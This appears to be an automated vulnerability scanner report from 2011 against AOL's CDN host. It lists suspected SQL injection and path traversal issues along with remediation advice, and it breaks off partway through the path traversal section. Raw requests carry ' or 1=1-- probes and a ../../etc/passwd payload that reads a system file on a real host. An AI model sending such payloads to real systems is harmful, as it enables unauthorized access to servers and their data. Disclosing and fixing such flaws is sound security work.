Report generated by XSS.CX at Thu May 05 02:15:50 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]

1.2. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]

1.3. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]

1.4. http://o.aolcdn.com/os_merge/ [file parameter]

2. File path traversal

3. Silverlight cross-domain policy

4. Cleartext submission of password

5. Flash cross-domain policy

6. Password field submitted using GET method

7. Password field with autocomplete enabled

8. Cross-domain Referer leakage

8.1. http://o.aolcdn.com/art/merge/

8.2. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js

8.3. http://o.aolcdn.com/os_merge/

8.4. http://o.aolcdn.com/os_merge/

9. Cross-domain script include

10. Email addresses disclosed

10.1. http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js

10.2. http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js

10.3. http://o.aolcdn.com/os_merge/

11. HTML does not specify charset

12. Content type incorrectly stated

12.1. http://o.aolcdn.com/favicon.ico

12.2. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico

12.3. http://o.aolcdn.com/os_merge/



1. SQL injection  next
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fanhouse/design/v2/css/fanhouse.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17216175'%20or%201%3d1--%20 and 17216175'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fanhouse17216175'%20or%201%3d1--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:36:02 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fanhouse17216175'%20or%201%3d2--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1159
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:10:14 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1159

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</u></p><p><b>description</b> <u>The requested resource (Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.2. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 22210006'%20or%201%3d1--%20 and 22210006'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d1--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:47:14 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d2--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1201
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:21:26 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1201

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </u></p><p><b>description</b> <u>The requested resource (Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- ) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.3. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/realestate/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 51809587'%20or%201%3d1--%20 and 51809587'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/realestate51809587'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:53:58 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/realestate51809587'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Cteonnt-Length: 1120
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:28:10 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1120

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /realestate51809587' or 1=2-- /favicon.ico</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /realestate51809587' or 1=2-- /favicon.ico</u></p><p><b>description</b> <u>The requested resource (Unknown File: /realestate51809587' or 1=2-- /favicon.ico) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.4. http://o.aolcdn.com/os_merge/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The file parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the file parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d1--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:22 GMT
Date: Thu, 05 May 2011 01:18:22 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 122281

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(g,i,m){var n=i.location,f=g(m),j=encodeURIComponent,l=0,d,e={namespace:"aol-multiauth",devId:"ao1ARQUlqDsixdht",successUrl:n.protocol+"//"+n.hostname+"/_uac/authReceiver.html",tabs:["aol","aim","facebook","google","yahoo","twitter"],branded:0,reload:0,lang:"en",locale:"us",snsAuthenticated:0,snsServer:"http://my.screenname.aol.com",authServer:"http://api.screenname.aol.com"},a={namespace:"aol-getToken",devId:"ao1ARQUlqDsixdht",authServer:"http://api.screenname.aol.com",callback:function(){}},c,h=[],b=0,o=navigator.userAgent.toLowerCase(),k=o.indexOf("safari")!==-1&&o.indexOf("chrome")===-1;g.multiAuth=function(q){if(q.authLink){var p=g.extend({},e,q),v=p.namespace,B=p.authServer,E=p.snsServer,z=p.devId,r=p.successUrl,F=p.authLink,G=p.branded,H=p.lang,A=p.locale,y=p.selectedTab,x=p.snsSiteDomain,D=p.snsPopupSiteState||j("OrigUrl="+j(r)),C=p.snsIframeSiteState||j("OrigUrl="+j(n)),t=p.snsAuthenticated;g.multiAuth.devId=z;function w(R,S){function T(U){b=0;U.preventDefault();var V=[E,"/_cqr/login/login.psp?uitype=popup&sitedomain=",x,"&lang=",H,"&locale=",A,O?"&st="+O:"","&siteState=",D].join(""),W=[B,"/auth/login?devId=",j(z),M.length===1?"&idType="+M.toString():"&supportedIdType="+M.join(","),O?"&st="+O:"","&language=",H+"-"+A,"&f=qs&succUrl=",j(r)].join("");g.openWindow(x?V:W,{width:528,height:G?530:395})}function J(V){b=0;V.preventDefault();var U=[B,"/auth/logout?devId=",j(z),"&a=",j(d),"&language=",H+"-"+A,"&f=json&succUrl=",j(r),"&doSNSLogout=1"].join("");if(k){g.openWindow(U,{width:528,height:G?530:395,focus:0});i.focus()}else{g("<iframe/>").attr("src",U).css({border:0,margin:0,width:0,height:0}).appendTo("body")}}var K=R.response,L=parseInt(K.statusCode,10),M=S.tabs,O=S.selectedTab,I,Q="click.ma";if(L===200){var P=R.response.data.userData.attributes,N;if(!P.pictureUrl){N=P.providerDisplayName;if(!N||N==="Aol"||N==="Aim"){P.pictureUrl="http://expapi.oscar.aol.com/expressions/get?f=native&type=buddyIcon&t="+P.loginId}}f.trigger("token-success."+v,{key:z,response:R.
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d2--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:23 GMT
Date: Thu, 05 May 2011 01:18:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 118535

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(a){a.fn.globalHeader=function(i){var d={activeTab:null,dualSearchBox:true,moreLinks:[],morePromoCount:2,moreText:"You might also like:",moreAnd:"and",moreMore:"More",moreTextHeadline:"More Sites You Might Like",webBaseUrl:"http://search.aol.com/aol/",webInv:"hdt-spinner",uiHat:"#head",uiWebForm:"#aol-header-search-form",uiWebInput:"#aol-header-search-input",uiWebButton:"#aol-header-search-icon",uiHatLinks:"#aol-header-links",uiHatTools:"#aol-header-auth-link",uiHatMorePopup:"#aol-header-more-list",uiNavLi:"li.nav-category",uiNavADd:".ad-728-90",auth:{doAuth:false,authenticated:false,authState:null,unauthState:null},search:{uiSearch:"#aol-header-search",params:{}},fn:{}},j={},f=this,g={},h={activeTab:null,moreLinksBuilt:false},c={init:function(k){g.$d=a(document);g.$c=a(k);g.hat=a(j.uiHat)[0];g.hatLinks=a(j.uiHatLinks)[0];g.$hatTools=a(j.uiHatTools);g.$webSearchForm=a(j.uiWebForm);g.$webSearchInput=a(j.uiWebInput);g.$webSearchButton=a(j.uiWebButton);g.$search=a(j.search.uiSearch);g.$searchInput=g.$search.find("input:first");g.$searchSubmit=g.$search.find("input:last");g.$navLi=g.$c.find(j.uiNavLi);g.$navADd=g.$c.find(j.uiNavADd);g.$hatMoreList=a(j.uiHatMorePopup);c.setActiveTab(null,j.activeTab);if(j.auth.doAuth){c.buildAuth()}if(j.dualSearchBox){b()}c.buildMoreLinks();c.buildDropDowns();g.$c.bind("setActiveTab",function(m,l){c.setActiveTab(m,l)});g.$c.bind("setAuthState",function(m,l){c.buildAuth(m,l)});if(j.search.params.initFocus!==undefined&&j.search.params.initFocus){g.$search.globalSearchBox(j.search.params)}else{g.$searchInput.bind("focus.aol-header",function(l){c.buildSearch(l)}).attr("autocomplete","off");g.$searchSubmit.bind("mouseover.aol-header",function(l){c.buildSearch(l)});if(j.search.params.searchText!==undefined&&j.search.params.searchText!==""){g.$searchInput.val(j.search.params.searchText)}}if(j.search.params.useCustomQuery===true){g.$searchInput.after('<input id="search-customvar" type="hidden" name="'+j.search.params.customQueryName+'" value="'+j
...[SNIP]...

2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /mobileportal/s2c_modal.js../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js../../../../../../../../etc/passwd&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
